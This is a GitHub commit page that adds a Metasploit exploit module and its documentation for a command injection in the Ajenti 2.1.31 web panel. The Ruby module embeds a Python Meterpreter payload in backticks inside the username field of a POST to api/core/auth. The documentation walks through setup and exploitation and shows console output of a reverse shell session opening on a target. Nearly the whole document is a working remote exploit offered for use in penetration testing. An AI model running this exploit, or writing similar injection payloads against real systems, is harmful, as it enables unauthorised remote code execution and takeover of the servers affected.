Skip to content
Permalink
Browse files

Land #12503, Add exploit module for Ajenti 2.1.31

  • Loading branch information
dwelch-r7 committed Dec 1, 2019
2 parents e206cda + fa16471 commit 41569b78ba4acc4cb5a393d43b19b9b50a038e68
@@ -0,0 +1,53 @@
## Description

This module exploits a command injection in Ajenti == 2.1.31. By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.

## Vulnerable Application

This module has been tested with [Ajenti 2.1.31](https://pypi.org/project/ajenti-panel/2.1.31/#files)

## Setup

1. `sudo pip install ajenti-panel==2.1.31 ajenti.plugin.dashboard ajenti.plugin.settings ajenti.plugin.plugins`
2. `ajenti-panel -v`

## Verification Steps

Example steps in this format (is also in the PR):

1. `use exploit/unix/webapp/ajenti_auth_username_cmd_injection`
2. `set RHOSTS <rhost>`
3. `set LHOST <lhost>`
4. `exploit`

## Options

**RPORT**

Set this to the Ajenti port. The default is 8000.

**TARGETURI**

Set this to the Ajenti base path. The default is `/`.


## Scenarios

### Tested Ajenti 2.1.31 on Ubuntu 19.10 x64

```
msf5 > use exploit/unix/webapp/ajenti_auth_username_cmd_injection
msf5 exploit(unix/webapp/ajenti_auth_username_cmd_injection) > set RHOSTS 172.16.172.135
RHOSTS => 172.16.172.135
msf5 exploit(unix/webapp/ajenti_auth_username_cmd_injection) > set LHOST 172.16.172.1
LHOST => 172.16.172.1
msf5 exploit(unix/webapp/ajenti_auth_username_cmd_injection) > exploit
[*] Started reverse TCP handler on 172.16.172.1:4444
[*] Exploiting...
[*] Sending stage (53755 bytes) to 172.16.172.135
[*] Meterpreter session 1 opened (172.16.172.1:4444 -> 172.16.172.135:53170) at 2019-11-18 19:51:04 +0300
meterpreter >
```
@@ -0,0 +1,87 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Ajenti auth username Command Injection',
'Description' => %q{
This module exploits a command injection in Ajenti == 2.1.31.
By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.
},
'Author' => [
'Jeremy Brown', # Vulnerability discovery
'Onur ER <onur@onurer.net>' # Metasploit module
],
'References' => [
['EDB', '47497']
],
'DisclosureDate' => '2019-10-14',
'License' => MSF_LICENSE,
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Privileged' => false,
'Targets' => [
['Ajenti == 2.1.31', {}]
],
'DefaultOptions' =>
{
'RPORT' => 8000,
'SSL' => true,
'payload' => 'python/meterpreter/reverse_tcp'
},
'DefaultTarget' => 0
))
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end

def check
res = send_request_cgi({
'method' => 'GET',
'uri' => '/view/login/normal'
})

unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end

unless res.body =~ /ajenti/i
return CheckCode::Safe
end

version = res.body.scan(/'ajentiVersion', '([\d\.]+)'/).flatten.first

if version
vprint_status "Ajenti version #{version}"
end

if version == '2.1.31'
return CheckCode::Appears
end

CheckCode::Detected
end

def exploit
print_status('Exploiting...')
json_body = { 'username' => "`python -c \"#{payload.encoded}\"`",
'password' => rand_text_alpha_lower(7),
'mode' => 'normal'
}
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'api', 'core', 'auth'),
'ctype' => 'application/json',
'data' => JSON.generate(json_body)
})
end
end

0 comments on commit 41569b7

Please sign in to comment.
You can’t perform that action at this time.